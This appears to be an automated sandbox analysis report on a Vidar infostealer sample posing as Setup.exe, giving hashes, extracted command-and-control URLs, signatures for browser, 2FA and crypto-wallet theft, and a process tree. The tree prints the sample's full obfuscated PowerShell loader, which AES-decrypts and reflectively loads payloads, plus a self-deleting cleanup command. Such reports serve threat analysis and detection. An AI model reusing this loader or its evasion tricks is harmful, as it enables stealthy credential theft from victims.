vidar | eb9b8e49c7f13e4ed0d670f40f8c4f1ee379dce9bc376b156d6c5292336f4e80

Analysis

max time kernel
60s
max time network
69s
platform
windows10-2004_x64
resource
win10v2004-20230220-es
resource tags

arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
18/05/2023, 11:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

38.9MB
MD5

db97787a82082bbcfd8102e8fb921fb3
SHA1

fe868dfc985cae473d7c24becafffe6336559b1f
SHA256

eb9b8e49c7f13e4ed0d670f40f8c4f1ee379dce9bc376b156d6c5292336f4e80
SHA512

08cf1ac6c7f55ab1af412c70c4feb202106cb1e946f41da5a5c846444c467bebe26a61dc7ecbba3e83c8f2ae1cd7900a8d3997453b5ee88f60f6f66ba1a3b6ce
SSDEEP

786432:AnzMyaT5GtfSEfzIOqUlgFEm/HVpXk6MnYH/CteijCEzUZG7MG5:AzMyYiqAzIPUvmHQhPYGCEzx5

Score

10^/10

vidar b89068e4534861e37a204b27184d8ae5 discovery spyware stealer

Malware Config

Extracted

Family

vidar

Version

3.8

Botnet

b89068e4534861e37a204b27184d8ae5

https://steamcommunity.com/profiles/76561198272578552

https://t.me/libpcre

Attributes

profile_id_v2
b89068e4534861e37a204b27184d8ae5
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7

Signatures

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	Setup.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	sqbtqzpixh.bat.exe

Executes dropped EXE 2 IoCs

pid	Process
1360	Setup.tmp
3640	sqbtqzpixh.bat.exe

Loads dropped DLL 5 IoCs

pid	Process
1360	Setup.tmp
1360	Setup.tmp
1360	Setup.tmp
3640	sqbtqzpixh.bat.exe
3640	sqbtqzpixh.bat.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4856	3640	WerFault.exe	93
232	3640	WerFault.exe	93

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sqbtqzpixh.bat.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sqbtqzpixh.bat.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1360	Setup.tmp
1360	Setup.tmp
3640	sqbtqzpixh.bat.exe
3640	sqbtqzpixh.bat.exe
616	powershell.exe
616	powershell.exe
616	powershell.exe
616	powershell.exe
3640	sqbtqzpixh.bat.exe
3640	sqbtqzpixh.bat.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3640	sqbtqzpixh.bat.exe
Token: SeDebugPrivilege	616	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1360	Setup.tmp

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 1360	400	Setup.exe	86
PID 400 wrote to memory of 1360	400	Setup.exe	86
PID 400 wrote to memory of 1360	400	Setup.exe	86
PID 1360 wrote to memory of 4192	1360	Setup.tmp	87
PID 1360 wrote to memory of 4192	1360	Setup.tmp	87
PID 1360 wrote to memory of 4192	1360	Setup.tmp	87
PID 4192 wrote to memory of 532	4192	cmd.exe	91
PID 4192 wrote to memory of 532	4192	cmd.exe	91
PID 4192 wrote to memory of 532	4192	cmd.exe	91
PID 532 wrote to memory of 3640	532	cmd.exe	93
PID 532 wrote to memory of 3640	532	cmd.exe	93
PID 532 wrote to memory of 3640	532	cmd.exe	93
PID 3640 wrote to memory of 616	3640	sqbtqzpixh.bat.exe	98
PID 3640 wrote to memory of 616	3640	sqbtqzpixh.bat.exe	98
PID 3640 wrote to memory of 616	3640	sqbtqzpixh.bat.exe	98

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:400
- C:\Users\Admin\AppData\Local\Temp\is-5TQB3.tmp\Setup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-5TQB3.tmp\Setup.tmp" /SL5="$D005C,39899474,805376,C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat" /install /quiet /norestart"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:532
    - - C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat.exe" -w hidden -c $lhaC='SplnmXRitnmXR'.Replace('nmXR', '');$ailD='MainnmXRModunmXRlnmXRenmXR'.Replace('nmXR', '');$Xgid='TranmXRnnmXRsnmXRfonmXRrnmXRmFinmXRnanmXRlBnmXRlocnmXRknmXR'.Replace('nmXR', '');$qxVb='GnmXRetnmXRCurnmXRrnmXRennmXRtnmXRPrnmXRocnmXRenmXRsnmXRsnmXR'.Replace('nmXR', '');$jrhe='LasnmXRtnmXR'.Replace('nmXR', '');$UTIs='ChanmXRngenmXRExtnmXRenmXRnnmXRsinmXRonmXRnnmXR'.Replace('nmXR', '');$LQvR='FronmXRmnmXRBasnmXRe6nmXR4nmXRStnmXRrinnmXRgnmXR'.Replace('nmXR', '');$pFbX='EntnmXRrnmXRynmXRPnmXRoinmXRntnmXR'.Replace('nmXR', '');$Pyyb='RenmXRadLnmXRinnmXResnmXR'.Replace('nmXR', '');$drKg='LoadnmXR'.Replace('nmXR', '');$gPyj='InnmXRvnmXRokenmXR'.Replace('nmXR', '');$vznw='CrnmXReatnmXReDnmXRecnmXRrynmXRptnmXRornmXR'.Replace('nmXR', '');function ZtKuw($kKCHF){$ODfKG=[System.Security.Cryptography.Aes]::Create();$ODfKG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ODfKG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ODfKG.Key=[System.Convert]::$LQvR('/v2zb1WzYLUObTA2T+F2g+zgGyO+54ZRLUgVU169mD8=');$ODfKG.IV=[System.Convert]::$LQvR('E/2/oOfQXvg4J2st+cXr9w==');$WzKHe=$ODfKG.$vznw();$raxgK=$WzKHe.$Xgid($kKCHF,0,$kKCHF.Length);$WzKHe.Dispose();$ODfKG.Dispose();$raxgK;}function JIaSv($kKCHF){$IkTir=New-Object System.IO.MemoryStream(,$kKCHF);$qlWAI=New-Object System.IO.MemoryStream;$zGLUC=New-Object System.IO.Compression.GZipStream($IkTir,[IO.Compression.CompressionMode]::Decompress);$zGLUC.CopyTo($qlWAI);$zGLUC.Dispose();$IkTir.Dispose();$qlWAI.Dispose();$qlWAI.ToArray();}$dVTKZ=[System.Linq.Enumerable]::$jrhe([System.IO.File]::$Pyyb([System.IO.Path]::$UTIs([System.Diagnostics.Process]::$qxVb().$ailD.FileName, $null)));$rKeRM=$dVTKZ.Substring(2).$lhaC(':');$dWkuF=JIaSv (ZtKuw ([Convert]::$LQvR($rKeRM[0])));$XXErh=JIaSv (ZtKuw ([Convert]::$LQvR($rKeRM[1])));[System.Reflection.Assembly]::$drKg([byte[]]$XXErh).$pFbX.$gPyj($null,$null);[System.Reflection.Assembly]::$drKg([byte[]]$dWkuF).$pFbX.$gPyj($null,$null);
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3640
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3640);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:616
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 236
        6⤵
        Program crash
        
        PID:4856
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1724
        6⤵
        Program crash
        
        PID:232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3640 -ip 3640
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3640 -ip 3640
1⤵
PID:2460

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
0e02552ba791ced2265d5d3b2cda85ef

SHA1
93aac3f3a5508d7af05e28a6d048e4c8c9c0d840

SHA256
e5c374ef817892a6c3d35c67d2646a00cf30c91fdde6a09a0b2e0468f560650e

SHA512
1dc639643dab426934a4263958f3f43496812a456e1d672138eb832a316417d5673dad638644900bc8d6a4d15ce31746c70c6f7dc606efd7e77995722535b1ba

Download Submit
C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat

Filesize
3.7MB

MD5
b03b42d32e91d0df67c5e949267407c1

SHA1
d0d166c06fef83a61eae1f568c8b359a22e2a545

SHA256
62ca5cedf3995220c43eb1ad6e3b28cd480620ff1db0c3518d192ab5e7e8945e

SHA512
9ae58d5c14856cb208b3f75deaabc3b99d2f409546f9a6ef028ce6f4ee114d7f5345be550f48c3dea159937a441096fb5549d38c517104999ce15655b6022ed3

Download Submit
C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Programs\Inland Technology\sqbtqzpixh.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgg4mpmy.h0k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5TQB3.tmp\Setup.tmp

Filesize
3.0MB

MD5
9fbfec73363168fbd9f27a2af8a7d7d6

SHA1
99129b3d3c30c5a767f52741c4a68c15435b358f

SHA256
6c3ce4d60700e80cf560982428d434c6292a2429cb9f71831da76cfe8c732ef0

SHA512
f689d146e7eb32ddf43d08e1700a5e56e70331fa02f00b97caba6cf652ec7c3c8d6aad3b76f8bc345451b5bd9236890e64f522c9c9758984330a86d1aca93c8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-VA4V7.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-VA4V7.tmp\_isetup\_isdecmp.dll

Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-VA4V7.tmp\_isetup\_isdecmp.dll

Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
memory/400-133-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/400-170-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/616-296-0x0000000007EC0000-0x0000000008464000-memory.dmp

Filesize
5.6MB

Download
memory/616-295-0x0000000006BE0000-0x0000000006C02000-memory.dmp

Filesize
136KB

Download
memory/616-294-0x0000000007870000-0x0000000007906000-memory.dmp

Filesize
600KB

Download
memory/616-293-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/616-217-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/616-216-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/1360-166-0x0000000000400000-0x000000000070D000-memory.dmp

Filesize
3.1MB

Download
memory/1360-138-0x0000000002890000-0x0000000002891000-memory.dmp

Filesize
4KB

Download
memory/3640-171-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/3640-190-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/3640-191-0x0000000007460000-0x0000000007ADA000-memory.dmp

Filesize
6.5MB

Download
memory/3640-192-0x0000000006E20000-0x0000000006E3A000-memory.dmp

Filesize
104KB

Download
memory/3640-189-0x0000000005E10000-0x0000000005E2E000-memory.dmp

Filesize
120KB

Download
memory/3640-195-0x0000000008DE0000-0x00000000090DC000-memory.dmp

Filesize
3.0MB

Download
memory/3640-188-0x0000000005D00000-0x0000000005E02000-memory.dmp

Filesize
1.0MB

Download
memory/3640-187-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

Filesize
64KB

Download
memory/3640-218-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/3640-177-0x0000000005720000-0x0000000005786000-memory.dmp

Filesize
408KB

Download
memory/3640-176-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/3640-288-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/3640-289-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/3640-292-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/3640-175-0x00000000054A0000-0x00000000054C2000-memory.dmp

Filesize
136KB

Download
memory/3640-173-0x0000000004CC0000-0x0000000004D42000-memory.dmp

Filesize
520KB

Download
memory/3640-174-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/3640-172-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/3640-167-0x00000000047C0000-0x00000000047F6000-memory.dmp

Filesize
216KB

Download